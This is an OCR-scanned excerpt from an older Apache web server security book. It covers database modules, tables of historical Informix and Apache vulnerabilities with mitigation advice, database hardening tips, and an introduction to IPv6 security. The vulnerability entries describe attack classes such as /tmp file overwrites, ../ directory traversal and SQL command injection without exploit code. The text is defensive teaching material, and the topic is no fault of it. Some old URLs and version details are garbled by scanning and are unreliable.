Robert S. Thau and Rob Mayoff wrote this very focused tool that 
essentially emulates the AOLserver API (certainly, enough of the 
AOLserver Tcl API to run the ArsDigita Community System). To contact 
them, try this address: info@arsdigita.com. Otherwise, you must be 
running Apache, Tcl, MM, and Oracle or PostgreSQL. Get it here: 
http: //www.arsdigita.com/download/. 

Ben Reser (ben@reser.org) wrote this Oracle authentication module 
for Oracle 7 and Apache 1.2 (older versions that you might still use if 
you've tweaked your system to a degree sufficient to preclude 
straightforward upgrades). Get it at 
http://ben.reser.org/mod_auth_ora/. 

Ben Reser (ben@reser.org) also wrote this Oracle authentication 
module for Oracle 8 and Apache 1.3. Get it at 
http://ben.reser.org/mod_auth_ora/. 
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TABLE 5.5 Continued 


Tool Description 





mod_auth_oracle/win32 Karsten Pawlik and Serg Oskin wrote this GPL authentication tool for 
Apache 1.3 or greater and Oracle 8. It authenticates against an 
Oracle8.x.x-Database plus Apache 1.3.x (and also supports mod_ss1), 
but it’s for Win32 strictly. Contact them at info@designlab.de or get 
the tool here: http: //www.designlab.de/service_support/down- 
loads/downloads/mod_auth_oracle.zip. 

mod_ora_plsql Michael Mikhaylov (mikx@izba.com) wrote this free module that lets 
you run Oracle PL/SQL stored procedures without using an OWS or 
OAS server. (Pretty cool...this could save you a bundle). It requires 
Apache 1.3.x and at least Net8. Get it at http: //plsql.izba.com/. 

mod_owa Alvydas Gelzinis (alvydas@kada.1t) and Oksana Kulikova wrote this 
free replacement for the ows pl/sql cartridge. Note that this requires 
at least Apache/1.3.x and Oracle sqlnet. Get it here: 
http: //ww.kada.1t/alv/apache/mod_owa/. 

PL/SQL Server Pages Finn Ellebaek Nielsen wrote this commercial tool that compiles PL/SQL 
Server Pages. It executes the resulting stored procedure by making a 
server redirect to another module. To use it, you need Oracle 7.3, 8.0, 
or 8.1. Contact Mr. Neilsen at info@changegroup.dk or get it at 
http: //www.changegroup.dk/en/cgpsp.htm. 





Apache and Informix 


Apache and Informix is an odd mix. One would expect that if you purchased 
Informix, you’d also use IBM’s entire suite. However, not everyone does. Can Apache 
and Informix work together? You bet. Marco Greco authored the Apache/Informix 
FAQ, which you'll find at http://www. iiug.org/resources/1linux/Howto_DBD.html. 


To do it, however, you'll need Perl 5.003+, Apache 1.2 or better, ESQL/C 5.x+ or 
Client SDK 2.x+, Informix-4gl compiled 6.x+, DBI, and DBD: : Informix. To get 
DBD: : Informix—really, the only odd component out—go to 
http://cpan.valueclick.com/modules/by -module/DBD/. 


Informix-Related Vulnerabilities 
Informix, like most enterprise databases, offers excellent security features. However, 
every so often, you'll see a weakness. Table 5.6 summarizes a few recent ones. 
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TABLE 5.6 Informix-Related Vulnerabilities 


Vulnerability 


Description 





Backup File Overwrite 


DataBlade Directories 


onsrvapd File Overwrite 


onbar_d, ondblog, and onsmsync—components of Informix’s backup 
solution—all create files with known names in /tmp. (OnBar is an 
Informix backup and restore utility that works with an XBSA-shared 
library to a storage library system. OnBar connects to a storage 
manager to send Informix data and pages to utilities like HP 
OmniBack.) Attackers can trigger these programs that are all named 
setuid root and setgid informix. No fix has been issued yet, so in 
the meantime, strip the setuid and setgid from these files, and force 
them to create files with names not so easy to predict. Affected 
versions are Informix SQL 7.31.UC5 on Conectiva ecommerce, 
Graficas 6.0 and 7.0; Debian 2.2; Mandrake 7.0, 7.1, 7.2, and 8.0; 
Red Hat i386 6.2, 6.2E, 7.0, and 7.1; SuSE 7.0, 7.1, and 7.2; 
Slackware 7.0 and 7.1; and Solaris 2.7 and 7.0. 

Informix’s Web DataBlade module provides file management and 
especially big binary support when you store images, videos, sound, 
maps, or other media in your database. DataBlade goes beyond a 
simple management tool, though, and developers use it to collaborate 
on gigs where some development team members are located some 
distance away. At any rate, affected versions harbor a directory traver- 
sal hole. Attackers who send successive ../ sequences can view direc- 
tories, and maybe even break out of DocumentRoot. IBM caught this. 
Obtain the patch at http: / /www- 
4.ibm.com/software/data/informix/support/. Affected versions are 
Informix Web DataBlade 3.3 SQL, 7.31.UC5, SQL 9.20.UC2, 3.4, SQL 
7.31.UC5, SQL 9.20.UC2, 3.5, SQL 7.31.UC5, SQL 9.20.UC2, 3.6, SQL 
7.31.UC5, SQL 9.20.UC2, 3.7, SQL 7.31.UC5, SQL 9.20.UC2, 4.10, 
SQL 7.31.UC5, SQL 9.20.UC2, 4.11, SQL 7.31.UC5, SQL 9.20.UC2, 
4.12, SQL 7.31.UC5, and SQL 9.20.UC2. 

onsrvapd, a component of Informix’s SNMP solution, creates a file 
with a well known name in /tmp. Attackers can exploit this because 
onsrvapd installs setuid root and setgid user informix. No fix 
has been issued yet, so in the meantime, strip the setuid and setgid 
from this file and force it to create files with names not so easy to 
predict. Affected versions are Informix SQL 7.31.UC5 on Conectiva 
ecommerce; Graficas 6.0 and 7.0; Debian 2.2; Mandrake 7.0, 7.1, 7.2, 
and 8.0; Red Hat i386 6.2, 6.2E, 7.0, and 7.1; SuSE 7.0, 7.1, and 7.2; 
Slackware 7.0 and 7.1; and Solaris 2.7 and 7.0. 
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TABLE 5.6 Continued 


Vulnerability Description 





snmpd File Overwrite Informix’s SQL package in affected versions allows remote attackers 
overwrite /tmp/snmpd.log and piggyback this to escalated privileges 
via snmpdm, the Simple Network Management Protocol Daemon, 
which installs setuid root. snmpd starts and creates /tmp/snmpd.1log, 
a fact well known to the networking community. To date, no vendor 
has issued a patch, and it’s easy to understand why. When starting 
snmpd, specify an alternative log file using the -I log file option. 
Affected versions are IBM Informix SQL 7.31.UC5 on Conectiva ecom- 
merce; Graficas 6.0 and 7.0; Debian 2.2; Mandrake 7.0, 7.1, 7.2, and 
8.0; Red Hat i386 6.2, 6.2E, 7.0, and 7.1; SuSE 7.0, 7.1, and 7.2; 
Slackware 7.0, and 7.1; and Solaris 2.7 and 7.0. 

WebDriver File Overwrite WebdDriver, Informix’s Web interface to the database will sometimes, 
in limited cases, write temp files insecurely, leading to file overwrites 
and perhaps system compromise. There is no known fix. Try an 
upgrade. 

WebDriver Remote Access WebdDriver, Informix’s Web interface to the database will sometimes, 
under very limited conditions, retrieve the management page and 
display it to unauthorized users. There, unauthorized users can alter 
data. Attacks do this by calling a script that would normally have vari- 
ables attached to it with no variables or arguments. There’s no fix yet, 
but the problem was limited to Version 1.0. Try an upgrade. 





General Database Security Measures 


Finally, no matter what database you use, some general rules apply: 


e Try to isolate interface code from database code. I know that seems absurd, 
especially because languages like PHP seem to naturally join them. However, 
when your database logic is inextricably tied to your interface code, it’s harder 
to manage and keep secure. If you can, aim for stored procedures (and use 
whatever language or protocol you like to trigger these). This way, your Web 
servers will carry hardly any critical code. 


e Don’t base your interface off of (or make it dependent on) your database. True, 
you can do some way-out things when you do this, but don’t. If you do, you 
invite DoS attacks (some idiot will write a shell script that calls curl, and 
hammers your database to death by forcing your Web server to repaint a speci- 
fied page 100,000 times). 


e Always validate input. Never allow users to send special characters. 
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Isolate your Web servers. Do not run a database and the Web on the same 
machine except in testing environments. 


Position your Web servers outside the firewall (or in the DMZ), and restrict 
incoming access to Apache’s port. Then, through a pinhole in your firewall— 
through which you should authenticate Web server cryptographically, and not 
by IP or hostname—let your Web servers send queries inside. 


If you don’t use stored procedures (perhaps you’re using MySQL and have no 
easy means of triggering such procedures), write your code in modules. That is, 
suppose your site will undertake only a few procedures (search, post a message, 
automatically rotate a quotation when it paints the screen). Enclose these func- 
tions in a single require file that scripts or PHP files call. By centralizing your 
code this way, you maintain better order, and therefore greater security. What 
you don’t want is your developers leaving test scripts all over the place that do 
things you’re unaware of and so forth. Instead, they target one or two files that 
contain all functions. 


Disable all default accounts that you don’t need, and on your operating 
system, eliminate (on both database and Web boxes) any extraneous accounts. 
The only “normal” user on your database box should be your DBA; the only 
normal user on your Web server should be your Web administrator account. In 
other words, don’t house your database on a populated machine, and no shell 
accounts! 


Choose your management tools wisely. Things like phpMyAdmin seem conve- 
nient, but always consider their potential security implications. A mysqlfront 
management session tunneled over ssh is always preferable to any Web-based 
application that itself uses PHP on the box. 


Don’t rely on your database’s native security measures alone. Always institute 
other controls and superimpose these atop your database. 


Try not to pass variables in URLs. This practice, as we’ll see in Chapters 14 and 
15, invites disaster. You never want to see, for example, a URL like this: 
http://www. yoursite.com/script.php3?name=anonymous&book=MaxApacheSec& 
email=samshacker@samspublishing.com. 


If you build transaction servers or cache systems that momentarily store data- 
base values, double-check your code to ensure that the cache or other storage 
mechanism is secure and disposes of unused or exhausted values. 


Choose your DBA well. This is one position in your firm that really demands 
responsibility. This person should have proven experience and be trustworthy. 
If ever there was a resume you should read carefully, it’s your DBA’s. 
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Summary 
At this point, we’ve covered all the security issues that could possibly arise before 
you install Apache. The next logical step is to choose an Apache distribution. Here, 
you have a choice: use a version you're already comfortable with, or use the latest 
version. Generally, you should choose the latest release. In the next chapter, we’ll 
cover that issue. 
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Apache Versions and 
Security 


Like any software distribution, Apache is constantly 
evolving. Hence, you should always use the latest release. 
But if you don’t, at least remember to apply patches when- 
ever Apache makes them available. This chapter covers 
historical Apache holes, and will familiarize you with what 
types of vulnerabilities Web servers typically suffer from. 


Brief History of Apache Versions 


The following lists the major Apache releases, along with 
their release dates: 


e 0.6 (May 31, 1995) 


0.6.5 (August 7, 1995) 


0.8.14 (September 21, 1995) 


1.0.0 (December 1, 1995) 


1.0.2 January 31, 1996) 


1.0.3 (April 19, 1996) 


1.0.4 (April 20, 1996) 


1.0.5 (April 20, 1996) 


1.1 (July 3, 1996) 


1.0.5 July 4, 1996 


1.1.0 (July 4, 1996) 


1.1.1 (July 9, 1996) 


1.2b (December 2, 1996) 


1.2 (October 1997) 
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e 1.2.6 (February 10, 1998) 
e 1.2.6 (March 24, 1998) 

e 1.3.0 June 5, 1998) 

e 1.3.1 July 22, 1998) 

e 1.3.2 (September 21, 1998) 
e 1.3.3 (October 9, 1998) 

e 1.3.4 January 10, 1999) 

e 1.3.9 (August 19, 1999) 

e 1.3.11 January 22, 2000) 
e 1.3.14 (October 10, 2000) 
e 2.0a1-2.0a9 (March 10, 2000—December 12, 2000) 
e 1.3.17 January 29, 2001) 


1.3.12 (February 25, 2001) 


1.3.19 (February 28, 2001) 

e 1.3.20 (May 15, 2001) 

e 1.3.21 (October 3, 2001; recalled for security issues) 
e 1.3.22 (October 9, 2001) 

e 1.3.23 January 24, 2002) 

e 2.0.32.beta (February 16, 2002) 


Only a minority of these releases were issued for security reasons, and of these, two 
were memorable: 


e For Apache 1.1.1—Research by Secure Networks triggered this release. SN 
researchers found two serious holes in 1.1.1. In the first, mod_cookies had a 
hole that gave attackers shell access with httpd’s child’s permissions. Not 
everyone used mod_cookies, of course, but sites were beginning to, so Apache 
distributed a security release. Additionally, mod_dir harbored a hole that 
enabled attackers to gain directory listings—even when an index.html (or 
default) file existed. 


e For Apache 1.3—This was a security release for Tomcat 3.2.3. Tomcat 3.2.2 
enabled unauthorized access to protected areas. This release closed that security 
hole and included several bug fixes. 
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These releases notwithstanding, Apache generally dealt with security issues by releas- 
ing patches when necessary. Overall, Apache’s security has been good. However, as 
new technologies emerge that Apache must support, vulnerabilities crop up more 
often—and many times, these aren’t attributable to Apache. Let’s take a quick walk 
down memory lane. 


Security Issues Common to Apache Releases 


Table 6.1 lists a few important Apache-related incidents since January 1999. These 
will familiarize you with vulnerabilities Apache and related software historically 
suffered and will suffer in the future. (Phrases italicized below highlight the source or 
result of such vulnerabilities.) 


TABLE 6.1 Historical Apache Problems and Their Causes 


Date Problem and Cause 





January 17, 1999 Debian /usr/doc exposure—On Debian 2.1, Apache allowed any 
remote user to view /usr/doc. 

June 3, 1999 Mac OS X server overload—32 or more concurrent httpd processes 
would overwhelm the system and cause a system panic. 

July 23, 1999 Squid cachemgr.cgi unauthorized remote access—Squid, a proxy 
server, used cachemgr.cgi for management. This utility contained a 
hole that enabled remote attackers to make unauthorized connections 
to a third host (using the Squid server as a springboard to attack other 
hosts). 

September 16, 1999 WWWBoard password exposure—This wasn’t an Apache issue. Matt 
Wright’s WWWBoard (from Matt’s Script Archive) had a hole that 
enabled remote attacks to obtain an administrator’s encrypted pass- 
word. 

September 25, 1999 ScriptAlias directive exposure—Apache 0.8.11 and 0.8.14 harbored a 
hole that enabled remote attackers to view CGI source code in any 
directory below DocumentRoot that had a ScriptAlias directive in the 
Apache configuration file. 

November 5, 1999 Guestbook CGI remote command execution—This was not an Apache 
issue. Matt Wright’s guestbook. pl script contained a hole that failed to 
screen attackers’ message-embedded Server Side Include directives. This led 
to attackers executing shell commands on the target. 

May 31, 2000 HTTP server (win32) root directory access—Apache 1.3.6, 1.3.9, 1.3.11, 
1.3.12, and 1.3.20 for Windows all harbored a hole whereby attackers 
could examine the root directory by sending a URL with innumerable 
forward-slash characters. 
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TABLE 6.1 Continued 





Date 


Problem and Cause 





July 17, 2000 


July 20, 2000 


July 20, 2000 


August 4, 2000 


August 15, 2000 


September 7, 2000 


September 11, 2000 


September 21, 2000 


September 29, 2000 


November 23, 2000 


December 6, 2000 


Apache: :ASP source.asp example script—The ASP module 

Apache: :ASP shipped with an example script that enabled remote 
attackers to write files arbitrarily to certain directories. 

Tomcat information exposure/path revealing—Tomcat 3.0 would return 
404 errors and append to these exhaustive information concerning 
paths and server status. This revealed data that could educate attackers on 
how to more effectively breach a target’s security. 

Jakarta-Tomcat /admin exposure—Tomcat 3.0 had a hole whereby 
remote attackers could break out of /admin and, in cases where Tomcat 
ran as root, examine the entire file system at will. 

PCCS-Mysql password exposure—This was not an Apache issue. The 
PCCS-Mysql database administrative tool, a PHP front-end for MySQL, 
called a PHP include file (dbconnect . inc) that contained administrative 
login information. Attackers could readily view this file with a Web 
browser. 

Trustix Apache-SSL RPM permissions—Trustix 1.1 (a secure Linux distrib- 
ution) shipped with Apache-SSL’s permissions as world-writable. 

SuSE CGI source code viewing—Apache 1.3.12 on SuSE harbored a hole 
that enabled remote attackers to send a PROPFIND HTTP method request 
and obtain sensitive information. Apache now offers incisive control over 
all HTTP request methods. 

Mandrake /perl http directory exposure—In Mandrake 6.1, 7.0, and 
7.1, mod_perl was configured to enable remote attackers to access 
/per1 and all files therein. This was a case of misconfiguration. 

SuSE Installed Package Disclosure—SuSE 6.3 and 6.4 shipped with a 
flawed httpd.conf file that exposed a list of installed packages. This 
misconfiguration afforded attackers significant reconnaissance on the 
target. 

Rewrite file exposure—mod_rewrite contained a regex flaw in which 
attackers could gain unauthorized access to files mapped with regular 
expressions. 

IBM server DoS attack—IBM HTTP Server 1.3.6.3 harbored a weakness 
wherein attackers could freeze the system by sending a URL 219 charac- 
ters long. 

Apache+Php3 file exposure—Apache 1.3 for Windows harbored a hole 
that enabled remote attackers to use PHP to view files on the target. 
Attackers needed only a Web client and a valid filename. 
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Date 


Problem and Cause 





December 19, 2000 


January 10, 2001 


January 12, 2001 


January 16, 2001 


March 25, 2001 


March 30, 2001 


May 22, 2001 


June 11, 2001 


July 4, 2001 


July 6, 2001 


Oracle Apache+WebDB back door—Oracle Internet Server 3.0.7 
provided WebDB, a management interface, which harbored a known 
and documented back door. Used in conjunction with Apache, WebDB 
would enable remote attackers to change Web pages, alter database 
tables, and monkey with permissions. 

Apache /tmp file race condition—Apache on Red Hat Linux 7.0 shipped 
with versions of htdigest and htpasswd that insecurely handled /tmp 
files. 

PHP source viewing—This was not an Apache issue. The Personal Home 
Page distribution (created by the folks at PHP), a one-stop home page 
creation and management system, harbored a hole wherein attackers 
could view PHP source code on the target. 

PHP .htaccess neutralization—In Mandrake 7.2, Personal Home Page 
plus Apache spelled trouble: the combination neutralized .htaccess 
controls, thus enabling remote attackers to gain unauthorized access to 
password-protected resources. 

W3C Amaya Templates Server Directory Traversal—Apache 1.3 (with 
W3C Amaya templates and Perl 5.004) harbored a hole that exposed 
directory listings to remote attackers. The hole was in the file 
sendtemp.pl. 

Tomcat 3.0 directory traversal—Tomcat 3.0 for NT failed to adequately 
filter |... / sequences. This enabled attackers to send custom-crafted URLs 
that would cause Apache to return directory listings. 

httpd DoS attack—Various Apache W32 distributions would fold after 
trying to process unusually long URLs. 

Unauthorized Mac OS X file access—Apache 1.3.14 Mac harbored a 
hole that enabled remote attackers to bypass explicitly articulated file 
access restrictions. The problem was with the underlying operating system: 
Mac OS X supports HFS, which is case insensitive. Apache administrators 
generally articulate their access restrictions case-sensitively. Because of this 
discrepancy, attackers could bypass such restrictions by alternating case. 
Tomcat cross-site-scripting—Tomcat 3.2.1 failed to filter embedded scripts 
from hyperlinks. Hence, malicious Webmasters could induce visitors to 
unwittingly attack third parties. 

Webmin environment variable exposure—Various Webmin versions failed 
to dispose of the administrator’s user ID and password, which it stored in a 
base64-encoded in environment variable. This enabled attackers to obtain 
and decode the values. 
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TABLE 6.1 Continued 


Date 


Problem and Cause 





August 13, 2001 


August 29, 2001 


August 29, 2001 


August 30, 2001 


September 5, 2001 


September 10, 2001 


September 21, 2001 


September 24, 2001 


October 9, 2001 


November 8, 2001 


November 24, 2001 


Server address disclosure—Various Apache versions returned the server's 
IP address on 404 errors of directories called without a filename argu- 
ment. 

mod_auth_pgsql_sys SQL attack—mod_auth_pgsql_sys, an Apache 
module component for PostgreSQL, enabled remote attackers to send 
SQL commands and, in limited circumstances, alter tables. 

AuthPG remote SQL query manipulation—mod_auth_pg, an Apache 
authentication module component for PostgreSQL, allowed remote 
attackers to send SQL commands and, in limited circumstances, alter 
tables. 

PHPMyExplorer arbitrary file disclosure—PHPMyeExplorer is a front-end 
that lets you manage sites through a browser. Affected versions have a 
critical flaw: They allow attackers to break out of DocumentRoot and 
browse the greater file system at will. This is a disastrous hole that can 
lead to root compromise. 

mod_auth_oracle SQL attack—mod_auth_oracle, an authentication 
module, allowed remote attackers to send SQL commands and, in limited 
circumstances, alter tables. 

Mac OS X directory disclosure—When attackers used the Mac OS X 
client and requested a URL from affected systems, if the request 
included a specification of a .DS_Store file, Apache revealed the targeted 
directory’s contents. 

Red Hat username disclosure—Affected Apache versions would confirm 
to remote attackers whether a username was valid, thus enabling attack- 
ers to gather valuable intelligence. 

Oracle9i app server path exposure—When attackers send a request for a 
JSP file that doesn’t exist, Oracle9i reveals internal Web paths. 
mod_auth_mysql SQL attack—mod_auth mysql, an Apache authentica- 
tion module, allowed remote attackers to send SQL commands and, in 
limited circumstances, alter tables. 

mod_user_track predictable UlIDs—mod_user_track, a module that 
provides cookie tracking, generated UIDs from a client’s IP, the system 
time, and the server PID. These weren't random, in other words, and quite 
predictable. 

Stronghold data disclosure—Stronghold, a secure Apache implementa- 
tion, created at installation two URLs at which administrators can view 
server status (/stronghold-info and /stronghold-status). Outsiders 
could see these URLs and thus obtain valuable intelligence. 
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Problem and Cause 





December 3, 2001 


December 8, 2001 


December 31, 2001 


January 7, 2002 


January 7, 2002 


January 31, 2002 


JRun Web directory disclosure—JRun, a Java application server, allowed 
attackers unauthorized directory access by issuing a malformed URL. 
Results varied, but in many cases attackers could obtain access to 
protected files, including ASP source files. 

split -logfile file append—Attackers could connect to an Apache 
virtual host that uses split - logfile and, using a specially crafted URL 
that precedes the target address with a slash, overwrite or append to 
log files. 

Last Lines CGI remote command execution/directory exposure—Last 
Lines, a free, Perl-based CGI tool, failed to filter metacharacters properly 
and therefore enabled remote users to execute arbitrary commands sent 
through a Web browser and examine any Web-readable directory. 
mod_auth_pgsql SQL attack—mod_auth_pgsq1, an Apache authentica- 
tion module, allowed remote attackers to send SQL commands and, in 
limited circumstances, alter tables. 

Win32 PHP.EXE hole—Win32’s PHP.EXE allowed remote attackers to view 
arbitrary files and, in some cases, launch executables. 

zml.cgi file disclosure—zm1.cgi, a Perl-based CGI script that handles 
SSI, failed to stringently filter filename arguments, and thus attackers could 
send a strand of ../ directives (which zm1.cgi would process), and the 
server would return the requested file. 





In Table 6.1, I italicized phrases to highlight the cause or affect of various vulnerabil- 
ities. Let’s revisit some of those phrases now: 


e Allowed attackers to break out of DocumentRoot 


e Allowed remote attackers to send SQL commands 


e Allowed remote attackers to view arbitrary files 


e Didn't properly screen shell metacharacters 


e Failed to dispose of the administrator’s user ID/password 


e Failed to screen message-embedded SSI directives 


e Had a 100-byte buffer 


e Insecurely handled | tmp files 


e Revealed the targeted directory’s contents 


e Shipped with permissions world-writable 
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The preceding ten statements articulate the most common problems in Web server 
software. (Other problems arise, such as race conditions, but these are more rare.) 
Failed input validation, buffer overflows, bad permissions, and out-of-the-box 
misconfigurations top the list. 


You will encounter these problems in the future—if not in Apache, then in software 
that works with Apache, Oracle, DB2, MySQL, MSQL, PostGRES, Perl, PHP, or any 
Web technology. To keep ahead of these issues, your greatest line of defense is to 
remain diligent. 


Patch Maintenance and Other Measures 


I cannot express how important remaining diligent is. Terrible things can happen 
when you fail in this regard. In the following sections, I’ll cover some common 
scenarios—treal-life scenarios that happen every day. These include the following: 


e Starting with flawed software 
e Experiencing reorganization or employee turnover 


e Allowing trust relationships between machines 


Starting with Flawed Software 


This book’s CD-ROM offers many good software packages, and these days, software 
developers get many of their tools from books such as this. Indeed, the computer 
publishing industry is responsible in no small measure for Linux’s success. By 
coupling documentation with source, the industry put Linux on every bookshelf in 
this country. 


Td estimate that approximately 30% of Apache users who also use Linux got their 
first Apache distribution from a CD-ROM in a Linux book. Frankly, many prefer 
buying a book to downloading 600MB image files and fiddling with manual installa- 
tion procedures. 


That’s wonderful. However, here’s a fact: anything you purchase off the shelf at a 
bookstore today—even if the publisher released it yesterday—is outdated. The lead 
time publishers have to get a book to market can sometimes be months. In the 
interim, the software that ships with it gradually but steadily degrades from a secu- 
rity standpoint. And this doesn’t apply only to Apache. 


Hence, if you obtain Apache, PHP, Perl, COBOLScipt, BASICScript, JSP, ASP, CORBA, 
Oracle, DB2, Informix, SAP, or other tools from books, be sure that once you’ve 
installed them, you proceed immediately to the vendor’s site and obtain and install 
the latest release. 
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I watched one firm install Red Hat 6.0 on its production Web servers (they bought a 
copy at CompUSA) when Red Hat was offering 7.0 on its Web site. No sooner had 
the company’s engineers installed 6.0, than a cracker from Romania took down their 
mail and Web—and he continued this activity (exploiting problems in bind and 
other utilities) until the engineers finally downloaded the update. 


Transfer of Ownership or Employee Turnover 


Another problem area is if your enterprise changes hands, reorganizes, or loses 
employees. Sometimes, Web server maintenance gets lost in the mix in these situa- 
tions. lll give you a practical example. 


In January 2001, I took a contract to design a secure EC system, chiefly for overseas 
firms. Database queries would be distributed across several continents, but the 
Apache-driven system resided in California. The contract was for 120 days but I 
finished early, on March 26, 2001, and thus left before the contract expired. 


Later that May, like many dot bombs, the firm fired the lion’s share of its develop- 
ment staff. By early September, it also fired its system administrator. From that day 
to this, the company operated without a Web administrator. The boxes ran older 
versions of Slackware and Solaris, too (both were Y2K releases) and no one had 
patched either machine since September 15, 2001. 


Anyone—even the most inexperienced hacker—could penetrate that company’s Web, 
mail, and DNS servers, and could do so today without much effort. Worse, the 
systems exposed are all production servers with one-of-a-kind technology on their 
drives, technology that cost millions in research and development. Finally, to date, 
no one has made any backups. I, the remaining 1099 on the project, am the only 
one who could restore their enterprise to even a baseline level of operation. Many 
firms slide into such situations. Don’t let yours do it. 


Network Trust Relationships 


Your Apache box may be patched, up-to-date, and relatively secure, and that’s great. 
This doesn’t mean that crackers won’t crack it. In many environments, the Web 
administrator is responsible for Web boxes only, whereas others shoulder the respon- 
sibility of securing mail, DNS, transaction, shell, application, or processor power 
servers. 


You might know that you are responsible only for Web systems, but your clientele or 
administrative staff might not know it. Worse, they might know it and not appreci- 
ate the distinction. From their view, a security breach is a security breach, and that’s 
that. 


To guard against such misunderstandings, avoid granting networks or hosts in other 
departments trust relationships with your Web servers whenever possible. If you fail 
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to do this, poor security measures or lax practices in an office over which you have 
no control may come back to haunt you. If a cracker cracks a box elsewhere that has 
a bona fide relationship of trust with your server, the cracker can at least cruise your 
box without fear. 


Two times out of three, the authentication method you'll use will exceed in author- 
ity simple IP/hostname checking on TCP/IP services (for example, hosts.allow and 
hosts.deny). Therefore, the cracker’s entry will be authenticated authoritatively. And 
once someone has shell access to your Web server, there’s no telling what will 
happen. 


Summary 


The message of this short chapter is plain: Start with a reasonably secure release and 
apply all patches, whenever they become available. Indeed, unless you have a reason 
not to, you should use Apache 2.0.x. 


NOTE 


Conditions could arise wherein you might use an earlier release. One is if you've customized 
an older release to a degree where upgrading could break software you wrote or security 
features you independently introduced. Another scenario is where you decide to study Apache 
(and Web servers in general) to see where in source code such holes develop and why. Short 
of these issues, though, stick to the latest release. 





7 IN THIS CHAPTER 


e What Is IPv6? 


Version 2.0 IPv6 Support 


e IPv6 and Security 


e Why Does Apache Support 


IPv6? 
bina Protocol Version 6 provides unlimited extension 


headers for fragmenting and routing, and will therefore e Apache and IPv6 Addressing 
contribute to a better and more efficiently managed 
Internet. However, IPv6’s most interesting new features are 
authentication and confidentiality. This chapter looks at 
these features and Apache IPv6 support. e IPv6 Implementations 


e IPv6 Address Issues in 
Development 


What Is IPv6? 


IPv6 is shorthand for Internet Protocol Version 6, or “next 
generation” Internet Protocol, an updated implementation 
that maximizes bandwidth efficiency and provides two 
protocol-level security layers. IPv6 provides several 
enhancements that make it superior to IPv4, the version 
nearly all internetwork applications currently use. 


IPv4 headers house ten header fields, two address fields 
(source and destination), and a handful of options therein. 
Certain IPv4 header fields are expandable, too, and support 
data of variable length. This fosters inefficiency. In 
contrast, IPv6 reduces this to something more efficient and 
clean, and expands the number of available addresses: 


e IPv6 headers are 64-bit 

e IPv6 header lengths are fixed 

e Addresses are 128-bit 

e IPv6 discards the header checksum 

e IPv6 drops time-to-live (TTL) for number of hops 


e [Pv6 takes an unlimited number of extension headers 
between the Internet header and the payload, includ- 
ing hop-by-hop, destination options, routing, frag- 
ment, authentication, encapsulating security, 
payload, and destination. 
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IPv6 also supports various flow-control methodologies that, while not yet applicable 
today, will eventually communicate to routers priority, flow labels, and so on. 


IPv6 and Security 


The Internet Engineering Task Force first publicly proposed IPv6 on July 25, 1994, in 
Toronto, Canada. IETF floated the recommendation as a proposed standard, and in 
November 1994, the Internet Engineering Steering Group (IESG) approved it. 


The result was RFC 1752, titled “The Recommendation for the IP Next Generation 
Protocol.” RFC 1752’s summary explains: 


The IETF started its effort to select a successor to IPv4 in late 1990 when projections indicated 
that the Internet address space would become an increasingly limiting resource. Several paral- 
lel efforts then started exploring ways to resolve these address limitations while at the same 
time providing additional functionality. The IETF formed the IPng Area in late 1993 to investi- 
gate the various proposals and recommend how to proceed. We developed an IPng technical 
criteria document and evaluated the various proposals against it. All were found wanting to 
some degree. After this evaluation, a revised proposal was offered by one of the working 
groups that resolved many of the problems in the previous proposals. The IPng Area Directors 
recommend that the IETF designate this revised proposal as the IPng and focus its energy on 
bringing a set of documents defining the IPng to Proposed Standard status with all deliberate 
speed. 


This protocol recommendation includes a simplified header with a hierarchical 
address structure that permits rigorous route aggregation and is also large enough to 
meet the needs of the Internet for the foreseeable future. The protocol also includes 
packet-level authentication and encryption along with plug and play autoconfigura- 
tion. The design changes the way IP header options are encoded to increase the flex- 
ibility of introducing new options in the future while improving performance. It also 
includes the ability to label traffic flows. 


NOTE 
Find RFC 1752 here: http: //rfc-editor.org. 





IPv6 provides security at two levels: 
e Authentication 


e Confidentiality 
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The IP Authentication Header Protocol 


The IP Authentication Header Protocol doesn’t encrypt data but instead ensures 
session integrity. That is, it ensures that the data that A transmits to B actually origi- 
nates from A. As expressed in RFC 2402, the IP Authentication Header Protocol 


...is used to provide connectionless integrity and data origin authentication for IP datagrams 


(hereafter referred to as just “authentication”), and to provide protection against replays. 


In replays, remote attackers use their machines to masquerade as authorized systems 
that recently established a session with a trusted remote host. Attackers capture 
packets from a session between trusted hosts and later resend or replay those packets. 
In some cases, this will fool the remote target into authenticating the attacking 
machine. 


To prevent this, the IP Authentication Header Protocol employs encryption algo- 
rithms that produce unique cryptographic values for each session packet. Because 
IPSEC-enabled systems generate these values on the fly during the session, attackers 
cannot feasibly anticipate them, and thus cannot forge an authenticated session. The 
IP Authentication Header Protocol supports several cryptographic schemes: 


For point-to-point communication, suitable authentication algorithms include keyed Message 
Authentication Codes (MACs) based on symmetric encryption algorithms (for example, DES) 
or on one-way hash functions (for example, MD5 or SHA-1). For multicast communication, 
one-way hash algorithms combined with asymmetric signature algorithms are appropriate, 
though performance and space considerations currently preclude use of such algorithms. The 
mandatory-to-implement authentication algorithms are described in Section 5 “Conformance 
Requirements.” Other algorithms MAY be supported. (RFC 2402, ftp: //ftp.isi.edu/in- 
notes/rfc1752.txt) 


Figure 7.1 depicts the Authentication Header Protocol format. 


Next Header Payload Length Reserved 
Security Parameters Index 


Sequence Number 
Authentication Data 


FIGURE 7.1 |P Authentication Header Protocol header format. 





Table 7.1 describes each field and its corresponding function. 
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TABLE 7.1 IP Authentication Header Protocol Header Fields 


Field Function 





Next Header The Next Header field consists of an 8-bit field that identifies the next 
payload’s type (next, in this case, meaning the payload that immediately 
follows the Authentication Header). This field’s value is chosen from the 
set of IP Protocol Numbers defined in the most recent Assigned Numbers 
RFC from the Internet Assigned Numbers Authority (IANA). Visit IANA 
here: http://www. iana.org. 

Payload Length The Payload Length field is an 8-bit field that specifies the Authentication 
Header’s length in 32-bit words minus 2. 

Reserved This 16-bit reserved field is for future use and contains a zero value. 

Security Parameters The 32-bit Security Parameters index field contains a value that, in combi- 
nation with the destination IP address and security protocol (AH), 
uniquely identifies the Security Association for the specified datagram. 

Sequence Number This 32-bit field contains a sequence number that increments for each 
packet in a given session, and is mandatory for the sending machine. 

Authentication Data This field of variable length contains the Integrity Check Value for the 
specified packet, which must be in 32-bit or 64-bit values and, if neces- 
sary, is padded to achieve those parameters. 





The IP Encapsulating Security Payload 


The IP Encapsulating Security Payload provides IPSEC’s second element: encryption. 
The Security Payload sandwiches, bookends, or encapsulates data inside its structure. 
Everything that follows the Authentication Header and precedes the Encapsulating 
